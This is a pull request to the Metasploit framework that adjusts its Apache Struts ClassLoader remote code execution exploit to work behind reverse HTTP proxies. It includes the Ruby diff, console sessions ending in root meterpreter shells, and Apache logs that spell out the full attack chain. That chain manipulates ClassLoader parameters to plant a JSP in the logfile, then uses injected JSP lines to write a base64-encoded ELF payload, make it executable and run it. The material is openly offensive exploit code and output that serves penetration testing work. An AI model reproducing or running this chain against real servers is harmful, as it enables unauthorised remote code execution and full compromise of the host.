### PR TITLE
Change HTTP requests to succeed when going through HTTP proxies

### DIFF
--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -97,9 +97,13 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def dump_line(uri, cmd = "")
     res = send_request_cgi({
-      'uri'     => uri+cmd,
+      'uri'     => uri,
+      'encode_params' => false,
+      'vars_get' => {
+        cmd => ""
+      },
       'version' => '1.1',
-      'method'  => 'GET',
+      'method'  => 'GET'
     })
 
     res
@@ -232,8 +236,11 @@ class Metasploit3 < Msf::Exploit::Remote
     # Dump the JSP to the log file
     print_status("#{peer} - Dumping JSP into the logfile...")
     random_request = rand_text_alphanumeric(3 + rand(3))
+
+    uri = normalize_uri("/", random_request)
+
     jsp.each_line do |l|
-      unless dump_line(random_request, l.chomp)
+      unless dump_line(uri, l.chomp)
         fail_with(Failure::Unknown, "#{peer} - Missed answer while dumping JSP to logfile...")
       end
     end


### PR DESCRIPTION
As @FireFart said in https://github.com/rapid7/metasploit-framework/pull/3314#discussion_r24064326 (thanks buddy!), the way the payload is sent to the server in the HTTP request must be inside `vars_get` and not directly as `uri` to avoid problems when Reverse HTTP proxies are in use.

The changes in this PR are to make it happen :)

Testing env:
- Ubuntu 12.04.5 64 bits (3.13.0-44-generic #73~precise1-Ubuntu SMP)
- Apache 2.2.22-1ubuntu1 with mod_proxy_ajp
- Apache Tomcat 8.0.5
- Java version "1.7.0_76"
- Apache Struts 2.3.16.1
- Git rev: de09559
- Struts 2 application

Test without apache proxy:

```
msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting            Required  Description
   ----            ---------------            --------  -----------
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           localhost                  yes       The target address
   RPORT           8081                       yes       The target port
   STRUTS_VERSION  2.x                        yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /hello_world/hello.action  yes       The path to a struts application action
   VHOST                                      no        HTTP server virtual host


Payload options (linux/x86/meterpreter/bind_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LPORT         4444             yes       The listen port
   RHOST         localhost        no        The target address


Exploit target:

   Id  Name
   --  ----
   1   Linux

msf exploit(struts_code_exec_classloader) > rexploit 
[*] Reloading module...

[*] Started bind handler
[*] localhost:8081 - Modifying Class Loader...
[*] localhost:8081 - Waiting for the server to flush the logfile
[+] localhost:8081 - Log file flushed at http://localhost:8081/fVq1.jsp
[*] localhost:8081 - Generating JSP...
[*] localhost:8081 - Dumping JSP into the logfile...
[*] localhost:8081 - Waiting for the server to flush the logfile
[+] localhost:8081 - Log file flushed at http://localhost:8081/fVq1.jsp
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1236992 bytes) to localhost
[*] Meterpreter session 1 opened (127.0.0.1:51820 -> 127.0.0.1:4444) at 2015-02-04 15:48:06 +0100
[+] Deleted fVq1.jsp
[+] Deleted untVZH

meterpreter > getuid 
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
```

Test with apache mod_proxy_ajp:

```
msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting            Required  Description
   ----            ---------------            --------  -----------
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           localhost                  yes       The target address
   RPORT           80                         yes       The target port
   STRUTS_VERSION  2.x                        yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /hello_world/hello.action  yes       The path to a struts application action
   VHOST                                      no        HTTP server virtual host


Payload options (linux/x86/meterpreter/bind_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LPORT         4444             yes       The listen port
   RHOST         localhost        no        The target address


Exploit target:

   Id  Name
   --  ----
   1   Linux

msf exploit(struts_code_exec_classloader) > rexploit 
[*] Reloading module...

[*] localhost:80 - Modifying Class Loader...
[*] Started bind handler
[*] localhost:80 - Waiting for the server to flush the logfile
[+] localhost:80 - Log file flushed at http://localhost:80/mhzu9704.jsp
[*] localhost:80 - Generating JSP...
[*] localhost:80 - Dumping JSP into the logfile...
[*] localhost:80 - Waiting for the server to flush the logfile
[+] localhost:80 - Log file flushed at http://localhost:80/mhzu9704.jsp
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1236992 bytes) to localhost
[*] Meterpreter session 2 opened (127.0.0.1:38814 -> 127.0.0.1:4444) at 2015-02-04 15:49:55 +0100
[+] Deleted mhzu9704.jsp
[+] Deleted wCPy

meterpreter > getuid 
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
```

Apache logs:

```
localhost - - [04/Feb/2015:15:49:32 +0100] "GET /hello_world/hello.action?class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.directory=webapps/ROOT&class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.prefix=mhzu9&class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.suffix=.jsp&class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.fileDateFormat=704 HTTP/1.1" 200 508 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:34 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 198 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:36 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 198 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:39 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 198 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:41 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 198 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 894 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<%@ page import=\"java.io.FileOutputStream\" %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<%@ page import=\"sun.misc.BASE64Decoder\" %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<%@ page import=\"java.io.File\" %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<% FileOutputStream oFile = new FileOutputStream(\"wCPy\", false); %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<% oFile.write(new sun.misc.BASE64Decoder().decodeBuffer(\"f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAijAAAA8gAAAAcAAAAAEAAAan1YmbIHuQAQAACJ42aB4wDwzYAx2/fjU0NTagKJ4bBmzYBbXlJoAgARXGoQUVCJ4WpmWM2A0eOwZs2AQ7BmiVEEzYCTtgywA82Aid//4Q==\")); %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<% oFile.flush(); %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<% oFile.close(); %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<% File f = new File(\"wCPy\"); %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<% f.setExecutable(true); %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<% Runtime.getRuntime().exec(\"./wCPy\"); %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:46 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 894 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:48 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 894 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:50 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 894 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:52 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 2063 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:52 +0100] "GET /hello_world/hello.action?class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.directory=&class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.prefix=&class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.suffix=&class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1" 200 508 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
```
